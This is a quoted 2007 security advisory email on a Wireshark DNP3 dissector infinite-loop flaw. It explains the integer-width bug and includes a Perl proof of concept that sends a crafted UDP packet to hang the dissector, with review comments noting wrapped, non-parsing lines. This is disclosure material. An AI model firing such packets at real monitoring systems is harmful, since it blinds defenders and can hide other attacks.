> -----Original Message-----
> From: SecuriTeam [mailto:support@xxxxxxxxxxxxxx]
> Sent: Thursday, August 30, 2007 10:52 AM
> To: html-list@xxxxxxxxxxxxxx
> Subject: [NEWS] Wireshark DNP3 Dissector Infinite Loop Vulnerability
>
>
>
> Wireshark DNP3 Dissector Infinite Loop Vulnerability
>
>
>
> A vulnerability in Wireshark's DNP3 dissector allows
> attackers to cause it to enter an infinite loop which in turn
> can be used to mask other types of attacks from being
> captured by Wireshark.
>
>
> Vulnerable Systems:
> * Wireshark version 0.99.5 and prior
>
> Immune Systems:
> * Wireshark version 0.99.6 and newer
>
> A vulnerability in the way Wireshark handles DNP3 data allows
> an attacker to fool the dissector into treating the item count
> supplied in the Application Layer's read/write objects request
> as a negative value. This in turn causes the loop found in the
> code:
> for (temp16 = 0; temp16 < num_items; temp16++)
> {
>
> to enter an infinite loop: temp16 is defined as a 16-bit unsigned
> int while num_items is defined as a 32-bit unsigned int, so a
> negative value is cast into a number larger than 16 bits can hold.
> temp16 wraps back to 0 after reaching its maximum and can
> therefore never reach the value stored in num_items.
>
> Proof of Concept:
> The vulnerability can be recreated by either using beSTORM
> <http://www.beyondsecurity.com/bestorm_overview.html> with
> the DNP3 protocol fuzzer and monitoring the traffic generated
> with Wireshark or by launching the following exploit code:
> #!/usr/bin/perl
> # Automatically generated by beSTORM(tm)
> # Copyright Beyond Security (c) 2003-2007 ($Revision: 3741 $)
>
> # Attack vector:
> # M0:P0:B0.BT0:B0.BT0:B0.BT0:B0.BT0
>
> # Module:
> # DNP3
>
> use strict;
> use warnings;
>
> use Getopt::Std;
> use IO::Socket::INET;
>
> # NOTE(review): as quoted in this mail several lines of the listing are
> # wrapped or truncated (the Data literal and the send die message among
> # them), so the text as shown here does not parse as-is.
> $SIG{INT} = \&abort;   # Ctrl-C: abort() below closes $sock if open, then dies
>
> # Defaults; -H, -P and -t on the command line override host, port, timeout.
> my $host = '192.168.4.52';
> my $port = 20000;
> my $proto = 'udp';
> my $sockType = SOCK_DGRAM;
> my $timeout = 1;
>
> #Read command line arguments
> # Getopt::Std spec: 'h' is a bare flag, 'H', 'P' and 't' each take a value.
> my %opt;
> my $opt_string = 'hH:P:t:';
> getopts( "$opt_string", \%opt );
>
> if (defined $opt{h}) {
> usage()
> }
>
> # Truth tests, not defined-ness: an explicit value of 0 is treated as
> # "not given" and the default is kept (// would tell undef from 0).
> $host = $opt{H} ? $opt{H} : $host;
> $port = $opt{P} ? $opt{P} : $port;
> $timeout = $opt{t} ? $opt{t} : $timeout;
>
> # Command script: one datagram out, then collect whatever comes back.
> my @commands = (
> {Command => 'Send',
> Data =>
> "\xC3\xC0\x01\x01\x00\x01\x07\x08\x01\x02\x03\x04\x05\x06\x07\x08},
> {Command => 'Receive'},
>
> );
>
> ###
> # End user configurable part
> ###
>
> #1. Create a new connection
> # Indirect-object syntax; IO::Socket::INET->new(...) is the preferred form.
> # With Proto 'udp' this only fixes the peer address, nothing is sent yet.
> my $sock = new IO::Socket::INET (
> PeerAddr => $host,
> PeerPort => $port,
> Proto => $proto,
> Type => $sockType,
> Timeout => $timeout,
> )
> or die "socket error: $!\n\n";
>
> print "connected to: $host:$port\n";
>
> $sock->autoflush(1);
> binmode $sock;   # raw bytes, no I/O layer translation
>
> #2. communication part
> # 'Receive' drains replies until a read times out (see receive() below);
> # 'Send' writes the raw Data bytes as a single datagram.
>
> foreach my $command (@commands)
> {
> if ($command->{'Command'} eq 'Receive')
> {
> my $buf = receive($sock, $timeout);
> if (length $buf)
> {
> print "received: [$buf]\n";
> }
> }
> elsif ($command->{'Command'} eq 'Send')
> {
> print "sending: [".$command->{'Data'}."]\n";   # raw bytes, not escaped
> # The die message below appears split by mail wrapping; a literal newline
> # inside the string would still be valid Perl.
> send ($sock, $command->{'Data'}, 0) or die "send
> failed, reason: $!\n";
> }
> }
>
> #3. Close connection
> close ($sock);
>
> #The end
>
> # Drain whatever the peer sends: read one byte at a time, each read guarded
> # by an alarm of $timeout seconds, and return the bytes collected once a
> # read times out or returns EOF/undef. Returns "" when nothing arrived.
> # Any other error inside the eval is re-thrown as "receive aborted".
> sub receive
> {
> my $sock = shift;
> my $timeout = shift;
>
> my $tmpbuf;
> my $buf = "";
>
> while(1)
> { # Example from perldoc -f alarm
> eval {
> # Handler is localised so it is restored when the eval exits.
> local $SIG{ALRM} = sub { die "timeout\n" };
> alarm $timeout;
>
> # (The trailing comment of the next line is wrapped onto its own line
> # in this mail quote.)
> my $ret = read $sock, $tmpbuf, 1; #We read data one byte
> at a time.
> if ( !defined $ret or $ret == 0 )
> { #EOF
> # NOTE(review): this die runs before "alarm 0" below, so the alarm set
> # above is not cancelled on this path and is still pending after the
> # localised handler has been restored.
> die "timeout\n";
> }
>
> alarm 0;
> $buf .= $tmpbuf;
> };
> if ($@) { #time out
> # Our own "timeout\n" (alarm handler or EOF branch) ends the loop;
> # anything else is treated as a real failure.
> if($@ eq "timeout\n")
> {
> last;
> }
> else {
> die "receive aborted\n";
> }
> }
> } #while
> return $buf;
> }
>
> # SIGINT handler (installed at the top of the script): close the socket
> # if it was created, then terminate via die.
> sub abort
> {
> print "aborting...\n";
> if ($sock)   # the file-scope lexical from the connection step
> {
> close $sock;
> }
> die "User aborted operation\n";
> }
> # Print the option summary and exit 0. Called from the getopts block
> # before -H/-P are applied, so the host and port shown are the built-in
> # defaults.
> sub usage
> {
> print "usage: $0 [-hHPt]\n";
> print "-h\t: this help message\n";
> print "-H\t: override default host - $host\n";
> print "-P\t: override default port - $port\n";
> print "-t\t: set socket timeout in seconds\n";
> exit 0;
> }
>
>
> Additional Information:
> The information has been provided by beSTORM.
> The original article can be found at:
> http://www.beyondsecurity.com/bestorm_overview.html
>
>